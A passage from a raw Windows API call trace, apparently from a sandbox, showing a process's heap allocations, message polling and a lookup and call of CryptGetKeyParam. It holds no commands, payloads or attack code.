0x43ca718 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.267] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.267] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0078.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.268] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0078.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.269] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0078.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0078.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0078.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.274] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0078.274] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2670, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2670*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.276] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.276] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.276] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: 